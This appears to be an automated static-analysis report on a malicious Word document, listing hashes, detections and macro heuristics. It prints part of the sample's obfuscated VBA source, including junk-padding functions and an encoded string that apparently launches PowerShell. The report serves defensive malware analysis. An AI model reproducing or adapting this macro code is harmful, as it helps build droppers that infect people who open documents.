Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a5509b36a9b9f001…

MALICIOUS

Office (OLE)

226.4 KB Created: 2019-03-15 21:12:00 Authoring application: Microsoft Office Word First seen: 2021-09-25
MD5: 41f82f403e1752afcf061004a73212df SHA-1: 7fdf8cfe5b2dd176e261e8c09538b153e26bd250 SHA-256: a5509b36a9b9f001b6ec7abf32474ea8f71e3d79df8567e19b2bb3b30009deee
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, specifically an AutoOpen macro. The presence of a GetObject call within the VBA p-code suggests an attempt to execute code, likely to download and run a second-stage payload. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.

Heuristics 6

  • ClamAV: Doc.Malware.Droo-6896835-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Droo-6896835-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60289 bytes
SHA-256: 1d105597f7e784cb68577ec72fa5622ceae4f1b9f9796e020640ba6bbdaa6f01
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BQxQAZAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lDUAAAoA"
Function z1AC4_A()
   If kCDwBk = KAQQUZ Then
       XAwcCCA = 807140381 * TD1AXAA4
       nAQA1DD = tQocAAX / 633834143 / 37006607 + 239929723 * 754512655 / 871966521 + (oACCAcA4 - Tan(do11ZG + 855296266 - 577802744 - Oct(jAZUZkc - Hex(788374768) + 890738880 + Oct(349146867))) + (477289878 / Sqr(579910016)))
       ncAkAUD = 277580615 * WAAAkDU
End If
   If iAUAAoBA = pZ4oZ1 Then
       BBoUQAk = 508592674 * ixZ1DZo
       WAAAZAD = s4Uko_ / 625922695 / 63763153 + 30750925 * 948672253 / 976040757 + (GQkAoU - Tan(EcAQAA + 220458743 - 51280665 - Oct(UAAA_A - Hex(545446455) + 148057455 + Oct(11176011))) + (674452369 / Sqr(311294999)))
       jCwxAGwQ = 673436255 * o4ZABA
End If
   If iBUABAZ = lBZAxA Then
       sUA4wA = 364649697 * QUUkAAAA
       NccAAx = zBDQCA / 164862735 / 797063330 + 825739780 * 911211470 / 917698242 + (BQBDDA - Tan(boQBAA1 + 872297686 - 66724995 - Oct(QZDUDQA - Hex(384780563) + 944842147 + Oct(519499904))) + (208935311 / Sqr(738535774)))
       EA_kwA = 208128765 * YcAcoABA
End If
   If zAAAZDA = sUkDZA Then
       uX4AUQ = 534212628 * hwDAQG
       aoBUA1D = OAZAAUZ / 57189296 / 32101116 + 569520364 * 297760706 / 931064337 + (KxwAwCoD - Tan(tcXCU_oA + 865955269 - 63009569 - Oct(UkwQBDZ - Hex(105530356) + 844234208 + Oct(565702656))) + (267762147 / Sqr(912056685)))
       LBkBQCAQ = 295431747 * bABGAAX
End If
   If uCAAAA = pCZAAA Then
       hkAUZA = 451088644 * rAQDQ4A
       J_AAowA = HAAXDUA / 278163905 / 194579321 + 191353584 * 212533361 / 544317322 + (hwADowx - Tan(XDADkAww + 944129522 - 310343675 - Oct(M_ACUA - Hex(509784722) + 418391608 + Oct(623713806))) + (678751379 / Sqr(903281591)))
       ND_Boc_A = 76635001 * ixQCCcAw
End If
   If ucDkUC = SQAAxAk Then
       WABkAAAQ = 461516306 * BwQoA4
       SAwx_A_4 = tBAU__cA / 123512461 / 822377604 + 552203938 * 364946267 / 321865355 + (HDAxA4 - Tan(UQAwADZ + 615469506 - 813429054 - Oct(icwAA1oo - Hex(472650998) + 610244657 + Oct(155235874))) + (988403145 / Sqr(942477152)))
       RAA4ADAD = 671427848 * NBDAwA
End If
End Function
Function R1AoXcU()
On Error Resume Next
If ZZGCk1 = JDD__AA Then
       woZ4o4wU = 521969686 * QAUBAAU4
       u_AAGCU = sAZAcwUA / 606752164 / 880632365 + 442418111 * 544390013 / 604209456 + (GkcZQA - Tan(KADABXX + 655868125 - 527487444 - Oct(OUAAUAwD - Hex(92131595) + 728374417 + Oct(524104891))) + (990784962 / Sqr(287209824)))
       PQcXBA_ = 612878388 * uAo_UwAw
End If
   If NUXA4UA = OBZAZZ Then
       TAkUAD = 157424435 * zAAkwA
       rAA1AA1 = WAoAoB_B / 494891308 / 328545142 + 592800891 * 215982215 / 338932341 + (TQACAc - Tan(JAADoAAA + 843099940 - 990622244 - Oct(F_wD_Q1 - Hex(722506656) + 325570329 + Oct(733723383))) + (405494320 / Sqr(506348481)))
       vDADAxU = 139631113 * L_4CAX
End If
   If NACBAZx = bwAAxA Then
       AABABoc = 680879815 * nAA4Zx
       mBG_CU = zCcXAU / 245224203 / 968817610 + 43839049 * 401417920 / 548907961 + (TcAZ1A1Q - Tan(B4CUZUBA + 138840255 - 547002862 - Oct(AUAADQ_B - Hex(111856662) + 464260225 + Oct(80207357))) + (372202813 / Sqr(350495293)))
       wA_AUAw = 953983284 * kAA_DUBA
End If
QwBoAA1 = "IAAmACAAKAAgACQAVgBlAFIAQgBvAFMAZQBwAFIAZQBGAGUAcgBFAE4AQwBlAC4AdABPAFMAVABSAGkA"
If PkQADAUC = SQCoUA Then
       ECAUUw = 346384682 * IQoQQG
       XDAUUA = CAA_AA / 152765075 / 745169039 + 354184191 * 747794806 / 56014307 + (VQAAoQU - Tan(qDAGAGD + 615466887 - 671128934 - Oct(VAAABA - Hex(904113250) + 396352631 + Oct(147568243))) + (428728107 / Sqr(800175746)))
       fAB4DQ = 918030212 * h4AABxZ
End If
   If iAAAAAZ = JoAAkAx Then
       CAwDCAAD = 275221804 * fUBBUAQ
       OQxAZDC = uwxGAxU / 144038732 / 306093381 + 124742707 * 731845568 / 69384276 + (KAcZADUD - Tan(ZGZAABo + 229036077 - 149838956 - Oct(EDC_QAB 
... (truncated)